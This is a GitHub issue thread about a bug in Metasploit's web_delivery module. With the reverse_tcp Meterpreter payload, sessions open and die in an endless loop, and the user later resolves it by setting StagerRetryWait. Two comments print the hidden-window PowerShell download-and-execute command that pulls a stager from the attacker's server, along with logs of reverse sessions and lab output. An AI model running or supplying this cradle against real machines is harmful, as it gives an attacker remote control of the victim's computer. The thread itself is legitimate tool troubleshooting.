search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.33k stars 14.02k forks source link

Meterpreter sessions "spawning forever" with meterpreter/reverse_tcp + powershell web_delivery #9250

Closed MRGEffitas closed 7 years ago

MRGEffitas commented 7 years ago

Steps to reproduce

       =[ metasploit v4.16.20-dev-                        ]
+ -- --=[ 1703 exploits - 970 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf exploit(web_delivery) > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set TARGET 2
TARGET => 2
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set SRVHOST xxx.info
SRVHOST => xxx.info
msf exploit(web_delivery) > set LHOST xxx.info
LHOST => xxx.info
msf exploit(web_delivery) > set LPORT 4664
LPORT => 4664
msf exploit(web_delivery) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(web_delivery) > set ReverseListenerBindAddress 81.x.x.x
ReverseListenerBindAddress => 81.x.x.x
msf exploit(web_delivery) > set URIPATH web_delivery
URIPATH => web_delivery
msf exploit(web_delivery) > exploit -j
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 81.x.x.x:4664
msf exploit(web_delivery) > [*] Using URL: http://xxx.info:8080/web_delivery
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://xxx.info:8080/web_delivery');
msf exploit(web_delivery) >

executing the command on the Windows victim

Expected behavior

One Meterpreter session opens.

Current behavior

Infinite number of sessions start, but none of them work. Tried with reverse_http and reverse_http works.

[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 8 opened (81.x.x.x:4664 -> 37.x.x.x:50882) at 2017-11-28 16:37:46 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 9 opened (81.x.x.x:4664 -> 37.x.x.x:50883) at 2017-11-28 16:37:46 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 10 opened (81.x.x.x:4664 -> 37.x.x.x:50884) at 2017-11-28 16:37:47 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 11 opened (81.x.x.x:4664 -> 37.x.x.x:50885) at 2017-11-28 16:37:48 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 12 opened (81.x.x.x:4664 -> 37.x.x.x:50886) at 2017-11-28 16:37:50 +0100
[*] Sending stage (179267 bytes) to 37.x.x.x
[*] Meterpreter session 13 opened (81.x.x.x:4664 -> 37.x.x.x:50887) at 2017-11-28 16:37:51 +0100

jobs -K

Stopping all jobs...
[*] Server stopped.
msf exploit(web_delivery) > [*] 37.x.x.x - Meterpreter session 8 closed.  Reason: Died
[*] 37.x.x.x - Meterpreter session 9 closed.  Reason: Died
[*] 37.x.x.x - Meterpreter session 10 closed.  Reason: Died
...
msf exploit(web_delivery) > [-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.

framework.log:

/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[11/28/2017 16:42:52] [e(0)] meterpreter: Failed to load extension: No response was received to the core_enumextcmd request.
[11/28/2017 16:42:52] [d(0)] meterpreter: Call stack:
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/client_core.rb:301:in `use'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1181:in `block in cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1169:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1169:in `cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:498:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:460:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:454:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:454:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:397:in `load_priv'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:166:in `block in bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/core/session_manager.rb:171:in `block (2 levels) in initialize_scheduler_threads'

System stuff

Metasploit version

msf exploit(web_delivery) > version
Framework: 4.16.20-dev-
Console  : 4.16.20-dev-

I installed Metasploit with:

PTF

Ruby and gems versions
msf exploit(web_delivery) > ruby -v
[*] exec: ruby -v

ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]
msf exploit(web_delivery) > gem query --local
[*] exec: gem query --local

actionpack (4.2.10)
actionview (4.2.10)
activemodel (4.2.10)
activerecord (4.2.10)
activesupport (4.2.10)
addressable (2.5.2)
afm (0.2.2)
arel (6.0.4)
arel-helpers (2.5.0)
Ascii85 (1.0.2)
backports (3.10.3)
bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16)
builder (3.2.3)
bundler (1.16.0)
coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.3)
diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5)
erubis (2.7.0)
factory_girl (4.9.0)
factory_girl_rails (4.9.0)
faraday (0.13.1)
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.5)
google-protobuf (3.5.0 x86_64-linux)
googleapis-common-protos-types (1.0.1)
googleauth (0.6.2)
grpc (1.7.2 x86_64-linux)
hashery (2.1.2)
i18n (0.9.1)
jsobfu (0.4.2)
json (2.1.0)
jwt (2.1.0)
little-plugger (1.1.4)                                                                                 
logging (2.2.2)
loofah (2.1.1)
memoist (0.16.0)
metasm (1.0.3)
metasploit-aggregator (1.0.0)
metasploit-concern (2.0.5)
metasploit-credential (2.0.12)
metasploit-framework (4.16.20)
metasploit-model (2.0.4)
metasploit-payloads (1.3.14)
metasploit_data_models (2.0.15)
metasploit_payloads-mettle (0.2.5)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
multi_json (1.12.2)
multipart-post (2.0.0)
nessus_rest (0.1.6)
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.1.1)
nokogiri (1.8.1)
octokit (4.7.0)
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13)
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
pg (0.20.0)
pg_array_parser (0.0.9)
postgres_ext (3.0.0)
pry (0.11.3)
public_suffix (3.0.1)
rack (1.6.8)
rack-test (0.6.3)
rails-deprecated_sanitizer (1.0.3)
rails-dom-testing (1.0.8)
rails-html-sanitizer (1.0.3)
railties (4.2.10)
rake (12.3.0)
rb-readline (0.5.5)
rbnacl (4.0.2)
rbnacl-libsodium (1.0.15.1)
recog (2.1.16)
redcarpet (3.4.0)
rex-arch (0.1.13)
rex-bin_tools (0.1.4)
rex-core (0.1.12)
rex-encoder (0.1.4)
rex-exploitation (0.1.15)
rex-java (0.1.5)
rex-mime (0.1.5)
rex-nop (0.1.1)
rex-ole (0.1.6)
rex-powershell (0.1.77)
rex-random_identifier (0.1.4)
rex-registry (0.1.3)
rex-rop_builder (0.1.3)
rex-socket (0.1.9)
rex-sslscan (0.1.5)                                                          
rex-struct2 (0.1.2)
rex-text (0.2.15)
rex-zip (0.1.3)
rkelly-remix (0.0.7)
rspec (3.7.0)
rspec-core (3.7.0)
rspec-expectations (3.7.0)
rspec-mocks (3.7.0)
rspec-rails (3.7.2)
rspec-rerun (1.1.0)
rspec-support (3.7.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
rubyntlm (0.6.2)
rubyzip (1.2.1)
sawyer (0.8.1)
signet (0.8.1)
simplecov (0.15.1)
simplecov-html (0.10.2)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.20.0)
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.4)
tzinfo-data (1.2017.3)
windows_error (0.1.2)
xdr (2.0.0)
xmlrpc (0.3.0)
yard (0.9.11)

OS

Ubuntu 14.04.3 LTS

busterb commented 7 years ago

Interesting, thanks. I haven't managed to reproduce this yet, though I'm also not using a hostname for my LHOST, but rather an IP address. Could this be a DNS resolution issue with the reverse_tcp stager? Is this a scenario that worked with a previous version? Have you tried windows/meterpreter_reverse_tcp instead?

msf exploit(web_delivery) > [*] Using URL: http://192.168.56.1:8080/xnZeDVG3Wlu0B
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $f=new-object net.webclient;$f.proxy=[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $f.downloadstring('http://192.168.56.1:8080/xnZeDVG3Wlu0B');
[*] 192.168.56.102   web_delivery - Delivering Payload
[*] Sending stage (179267 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:49806) at 2017-11-28 11:30:57 -0600

msf exploit(web_delivery) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-K2I1LJF
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
MRGEffitas commented 7 years ago

Yesterday, I tried this like 5 times, same thing happened (I closed msfconsole every time).

Today, while trying reverse_http, I got the following error out of the blue. I never played with this StagerRetryWait before:

msf exploit(web_delivery) > exploit -j
[-] Exploit failed: The following options failed to validate: StagerRetryWait.
[*] Exploit completed, but no session was created.

After setting StagerRetryWait, I cannot reproduce the issue anymore. I think it is OK to close the issue, thank you for your help.